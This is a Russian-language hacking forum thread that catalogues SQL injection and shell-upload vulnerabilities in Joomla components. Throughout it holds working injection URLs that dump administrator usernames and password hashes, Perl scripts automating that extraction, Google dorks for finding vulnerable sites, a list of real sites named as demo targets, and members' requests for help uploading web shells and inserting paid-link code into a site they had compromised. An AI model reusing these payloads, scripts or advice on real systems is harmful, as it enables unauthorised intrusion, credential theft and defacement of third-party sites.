Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Discussion in 'Веб-уязвимости' started by it's my, 6 Oct 2007.

  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    879
    Reputations:
    858
    Joomla "com_jomtube" component SQL Injection

    Уязвим параметр user_id
    Эксплyатация:
    Code:
    index.php?view=videos&type=member&user_id=[ID юзера] and 1=0 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a,usertype),0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from jos_users limit 0,5 -- &option=com_jomtube
    user_id - должен быть существующий!

    POC:
    Дорк: "inurl:com_jomtube"


    Уязвимый код:
    components/com_jomtube/models/video.php
    Пару моментов, все приводить не буду:

    P.S:Уязвимость старая и давно есть в паблике, как сегодня убедился до сих пор актуальна.
    http://www.exploit-db.com/exploits/14434/
     
    _________________________
    3 people like this.
  2. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Joomla tag Remote Sql Exploit
    dork: inurl:index.php?option=com_tag


    PHP:
    #!/usr/bin/perl -w
    print "\t\t\n\n";
    print 
    "\t\n";
    print 
    "\t                                                   \n";
    print 
    "\t      Joomla com_tag Remote Sql Exploit \n";
    print 
    "\t\n\n";
    use 
    LWP::UserAgent;
    print 
    "\nExample:[http://wwww.site.com/]: ";
    chomp(my $target=<STDIN>);
    $user="username";
    $pass="password";
    $table="jos_users";
    $d4n="com_tag&task";
    $b LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    $host $target ."index.php?option=".$d4n."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a";
    $res $b->request(HTTP::Request->new(GET=>$host));
    $answer $res->content;
    if (
    $answer =~ /<user>(.*?)<user>/){
    print 
    "\nLos Information for site:\n";
    print 
    "\n
    * Admin User : $1"
    ;
    }
    if (
    $answer =~/<pass>(.*?)<pass>/){print "\n
    * Admin Hash : $1\n\n"
    ;
    print 
    "\t\t#   Exploit finished   #\n\n";}
    else{print 
    "\n[-] Exploit Failed...\n";}
     
    1 person likes this.
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    879
    Reputations:
    858
    Joomla "com_commedia" component SQL Injection

    Уязвим параметр id
    Эксплyатация:
    Code:
    index.php?option=com_commedia&format=raw&task=down&pid=124&id=2238+and+1=0+union+select+concat%28username,0x3a,password,0x3a,usertype%29,2+from+jos_users+where+usertype+like+0x2561646D696E6973747261746F7225+limit+0,1+--+
    POC:
    Дорк: "inurl:com_commedia id"


    Уязвимый код:
    components/com_commedia/models/file.php

    P.S: "_ttp://www.explo[google]it-db.com/exploits/22152/"
     
    _________________________
    #263 winstrool, 14 Nov 2012
    Last edited: 14 Nov 2012
    1 person likes this.
  4. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Если не просто копипастить баги и совать кавычки, а хотя бы 10 секунд посмотреть в код, станет очевидно, что там ещё и чтение файлов.

    Как там у хакеров? 0day pRiv8 :D

    index.php?option=com_commedia&format=raw&task=down&pid=124&id=2238+and+1=0+union+select+0x2e2f636f6e66696775726174696f6e2e706870,2--+
     
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    879
    Reputations:
    858
    Моя цель была раскрыть сам уязвимый код, а не копипаст! на счет чтения файлов я тоже видел, но еще пока не проверил...
     
    _________________________
  6. alerondel

    alerondel Member

    Joined:
    20 Apr 2011
    Messages:
    165
    Likes Received:
    9
    Reputations:
    6
    Joomla "com_conference" SQL Injection

    Уязвим параметр ID

    Эксплуатация:
    Code:
    /index.php?option=com_conference&task=show&id=999999.9 /*!UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e),0x31303235343830303536,0x31303235343830303536*/--
     
  7. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Сканер joomla сайта​


    Появился новый проект - c0lips.ru, здесь вы можете проверить свой сайт на наличие уязвимых компонентах, посмотреть советы по устранению уязвимостей, посмотреть уязвимый код компонента и уже исправленный код.

    Для актуализации проекта, прошу добавлять свои уязвимости по адресу: тык
     
    2 people like this.
  8. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,116
    Likes Received:
    825
    Reputations:
    231
    Joomla All v1.5 Error Based SQL Injection Vulnerability

    Joomla Component com_user

    ####
    # Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
    # Author: Caddy-Dz
    # Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
    # E-mail: islam_babia@hotmail.com
    # Category:: webapps
    # script home : http://joomla.com
    # Dork : inurl:eek:ption=com_user
    # Security Risk: critical
    # Tested on: Back|Track 5 KDE / French
    ####
    # this was written for educational purpose only. use it at your own risk.
    # author will be not responsible for any damage caused! user assumes all responsibility
    # intended for authorized web application pentesting only!

    // Description :

    the affected component is /com_user/ in all joomla v1.5
    P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version :)

    // Exploit :

    http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
    http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection) [replacing id number by character]

    # priv8 youtube link, just people who has the link could view :
    http://www.youtube.com/watch?v=g0QcjxIb68I

    // Demo :

    http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
    http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
    http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
    http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
    http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
    http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid='


    # Greets To : ==============================================================================
    # The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates ,
    # D4NB4R , Inj3ct0r Team , jos_ali_joe , exploit-id team , OWASP Algeria
    # ... And All Algerian Hax0rs
    ============================================================================================

    # 1337day.com [2012-12-12][/quote]
     
    _________________________
    #268 grimnir, 20 Dec 2012
    Last edited by a moderator: 21 Dec 2012
  9. po[w]er

    po[w]er Banned

    Joined:
    1 Oct 2012
    Messages:
    57
    Likes Received:
    0
    Reputations:
    0
    отличный
     
  10. iskus

    iskus New Member

    Joined:
    14 Oct 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    TinyMCE TinyBrowser addon multiple vulnerabilities

    Салют, парни, кому-то удалось использовать эту уязвимость для заливки шелла? Может натолкнете на мысль верную, как обойти Restricted access

    http://yehg.net/lab/pr0js/advisories/tinybrowser_1416_multiple_vulnerabilities

    Спасибо за помощь.
     
  11. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Данная бага актуальна для joomla 1.5.12, которая сейчас практически не встречается и как вы ее собрались использовать я не понимаю.
    В joomla заливайте шелл через модули/шаблоны, собственно как и в других CMS...
     
  12. xaknem

    xaknem New Member

    Joined:
    12 Feb 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста, залит шелл на сайт под управлением Joomla (доступа в админку нет), подскажите можно ли в какой либо модуль воткнуть код системы sape ?

    Дело в том что стоят права только на чтение в папке шаблона, и стандартным способом не удается установить sape
    На модули выставлены права разрешающие редактирование


    Также в папке шаблона залит мой php файл который я могу редактировать (на него выставлены права)

    Заранее благодарен
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    879
    Reputations:
    858
    Если есть возможность заливать в папку шаблона, то попробуй сначало скапировать к себе шаблон, орегинал удалить, а потом перезалить его, по идее должны стать права на правку, но естественно если сама папка в каторой находится шаблон с полными правами...
     
    _________________________
  14. xaknem

    xaknem New Member

    Joined:
    12 Feb 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    права на правку только в одном файле который лежит в папке с шаблоном, могу редактировать только его

    еще права на редактирование на папки модулей
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    879
    Reputations:
    858
    PHP-iclude: com_jomholiday
    залиться пока не получилось, как зальюсь приведу пример уязвимого кода.
     
    _________________________
    4 people like this.
  16. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    Code:
    # Exploit Title:Joomla com_collecter shell upload 
    # Author: Red Dragon_al (Alb0zZ Team) 
    # Home :HackForums.AL,alb0zz.in 
    # Date :19/01/2013   
    # Category:: web apps 
    # Google dork: [inurl:index.php?option=com_collector] 
    # Tested on: Windows XP   
    # Download: http://www.steevo.fr/en/download 
    # Home Page: http://www.steevo.fr/   --------------------------------------- #      ~ Expl0itation ~      
    # ---------------------------------------   
    1- Google dork: [inurl:index.php?option=com_collector]   
    2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   
    3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   upload ur shell as : shell.php                                                  
    # Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.   #2013
    http://www.exploit-db.com/exploits/24228/
     
  17. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    879
    Reputations:
    858
    P.S: копировать не стоит сплоиты с других ресурсов, если копи пастите, то лудше с раскрытием уязвимого года не болие...
     
    _________________________
  18. uCryNet

    uCryNet Member

    Joined:
    11 Mar 2012
    Messages:
    53
    Likes Received:
    13
    Reputations:
    5
    exploit [joomla]


    Test screen [http://data.imagup.com/10/1171476626.png] [http://168.63.206.26/test2.png]
    3xpl01t c0d3 :

    Code:
    Dork (N/A) "inurl:option=com_huruhelpdesk" or "inurl:/index.php?option=com_huruhelpdesk&view=detail"
    author : *devil-zone.net
    greet is to : devil-zone.net *all members 
    vel = sqlI 
    S1mPl3 P3rL 3xpl01t3r

    Code:
    #!/usr/bin/perl
    #greet is to Evil-Dz
    system("clear");
    print "***************************************\n";
    print " * * * * Good Luck & Hafe Fun * * * * *\n";
    print " * * * Coded by devil-zone forum * * **\n"; 
    print "***************************************\n\n";
    use LWP::UserAgent;
    print "Target page [ex: HosT] --> ";
    chomp(my $target=<STDIN> );
    $column_name="concat(username,0x3a,password,0x3a,mail)";
    $table_name="jos_users";
    $prm="-1/**/union/**/select/**/";
    $start= LWP::UserAgent->new() or die "[!] Error while processing";
    $start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
    $website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";
    $ok= $start->request(HTTP::Request->new(GET=>$website));
    $ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
    print "[+] Password found --> $1\n\n";
    sleep 1;
    }
    else
    {
    print "No password found :(\n";
    } 
     
  19. rik

    rik New Member

    Joined:
    9 Aug 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    подскажите пожалуйста, как туда залить шелл? выбрать файл, даёт. а кнопка на загрузку не активна.
     
  20. dmg

    dmg Member

    Joined:
    31 Oct 2011
    Messages:
    153
    Likes Received:
    12
    Reputations:
    0
    Подскажите пожалуйста, это какая версия джумлы: $Id: configuration.php-dist 11687 2009-03-11 17:49:23Z ian $ ?
     
Loading...